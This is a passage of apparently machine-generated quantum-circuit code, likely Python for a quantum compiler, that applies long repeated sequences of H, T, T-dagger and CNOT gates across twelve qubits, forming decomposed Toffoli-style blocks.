k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,3])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[3,0])
k.gate('cnot',[11,3])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[11])
k.gate('cnot',[2,1])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[11])
k.gate('cnot',[11,2])
k.gate('cnot',[1,11])
k.gate('cnot',[2,1])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[7])
k.gate('cnot',[10,0])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[7])
k.gate('cnot',[7,10])
k.gate('cnot',[0,7])
k.gate('cnot',[10,0])
k.gate('h',[7])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[8])
k.gate('cnot',[5,4])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[8])
k.gate('cnot',[8,5])
k.gate('cnot',[4,8])
k.gate('cnot',[5,4])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,6])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('tdag',[8])
k.gate('cnot',[6,8])
k.gate('tdag',[6])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[6,9])
k.gate('cnot',[8,6])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[6])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[6])
k.gate('cnot',[10,11])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[6])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('cnot',[10,11])
k.gate('h',[6])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[7])
k.gate('cnot',[2,1])
